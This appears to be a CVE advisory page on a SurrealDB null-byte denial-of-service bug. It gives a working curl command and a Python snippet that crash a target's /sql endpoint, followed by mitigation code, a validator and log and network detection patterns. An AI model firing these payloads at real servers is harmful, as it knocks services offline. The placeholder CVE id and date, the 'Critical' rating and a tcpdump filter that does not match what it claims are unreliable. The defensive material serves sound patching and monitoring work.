How the CVE Works
The vulnerability in SurrealDB is triggered when a crafted HTTP query containing a null byte (`%00`) is sent to the `/sql` endpoint. The database fails to handle this malformed input because of an uncaught exception in the `net` module: when the query result is converted to JSON for the HTTP response, the null byte raises a fatal error that crashes the SurrealDB instance. Any authenticated user can therefore cause a denial of service (DoS) by submitting such a query, and applications that rely on SurrealDB as a backend are disrupted as well if they do not sanitize input before forwarding it.
DailyCVE Form
Platform: SurrealDB
Version: <2.2.2, <2.1.5, <2.0.5
Vulnerability: Null Byte DoS
Severity: Critical
Date: 2023-XX-XX
What Undercode Says:
Exploitation:
1. Craft a malicious HTTP POST request to `/sql` with a null byte:
curl -X POST "http://target:8000/sql" -H "Content-Type: application/json" -d '{"query":"SELECT \u0000"}'
2. Use Python to automate exploitation:
import requests

payload = {"query": "SELECT \x00"}
requests.post("http://target:8000/sql", json=payload)
Mitigation:
1. Patch: Upgrade to SurrealDB v2.2.2, 2.1.5, or 2.0.5+.
2. Input Sanitization: Reject queries containing null bytes:
if (query.includes('\x00')) throw Error("Invalid input");
3. WAF Rules: Block requests with `%00` or null bytes (the nginx rule below inspects only the URL query string via `$args`; catching `%00` in a POST body needs a WAF or module that reads the request body):
if ($args ~ "%00") { return 403; }
4. Process Monitoring: Automatically restart SurrealDB on crash:
while true; do surreal start --log debug; done
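The input-sanitization step above covers only a raw NUL in an already-decoded string. The following added example (not SurrealDB's code or the advisory's) validates an HTTP body before it is forwarded to `/sql`, rejecting the raw byte, the JSON `\u0000` escape and the percent-encoded `%00`; it assumes the `{"query": "..."}` payload shape shown in the curl example.

```python
import json
import re
from urllib.parse import unquote

# A NUL can reach the /sql handler in three guises: the raw byte, a JSON
# "\u0000" escape that survives decoding as literal text, or a URL-encoded %00.
_NULL_BYTE_FORMS = re.compile(r"\x00|\\u0000|%00", re.IGNORECASE)


def contains_null_byte(text: str) -> bool:
    """True if text carries a NUL in raw, JSON-escaped or percent-encoded form.

    The percent-decoded copy is checked too, so a double-encoded %2500 that an
    upstream component would turn into %00 is rejected as well.
    """
    return bool(_NULL_BYTE_FORMS.search(text) or _NULL_BYTE_FORMS.search(unquote(text)))


def validate_sql_request(raw_body: bytes) -> tuple[bool, str]:
    """Validate an HTTP body before forwarding it to SurrealDB's /sql endpoint.

    Returns (accepted, reason). The payload shape {"query": "<SurrealQL>"} is
    assumed from the curl example on this page; anything else is refused.
    """
    if b"\x00" in raw_body:
        return False, "raw null byte in request body"
    try:
        body = json.loads(raw_body.decode("utf-8"))
    except (UnicodeDecodeError, json.JSONDecodeError) as exc:
        return False, f"malformed JSON: {type(exc).__name__}"
    if not isinstance(body, dict) or not isinstance(body.get("query"), str):
        return False, "body must be a JSON object with a string 'query'"
    if contains_null_byte(body["query"]):
        return False, "null byte in query"
    return True, "ok"


if __name__ == "__main__":
    # Constructed sample bodies: one benign, one carrying the escaped NUL.
    for sample in (b'{"query":"SELECT * FROM person"}',
                   b'{"query":"SELECT \\u0000"}'):
        print(sample, "->", validate_sql_request(sample))
```

Place the check in the gateway or application layer that owns the SurrealDB credentials, so an authenticated caller never gets the malformed query to the database.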
Detection:
1. Log analysis for null byte patterns:
grep -rlaP '\x00|\\u0000|%00' /var/log/surrealdb/
2. Network monitoring for malformed JSON:
tcpdump -i eth0 'port 8000 and (tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x7b226572)'
References:
- Patch: surrealdb/surrealdb5647
- CVE: CVE-2023-XXXX
- Reported By: https://github.com/advisories/GHSA-rq86-9m6r-cm3g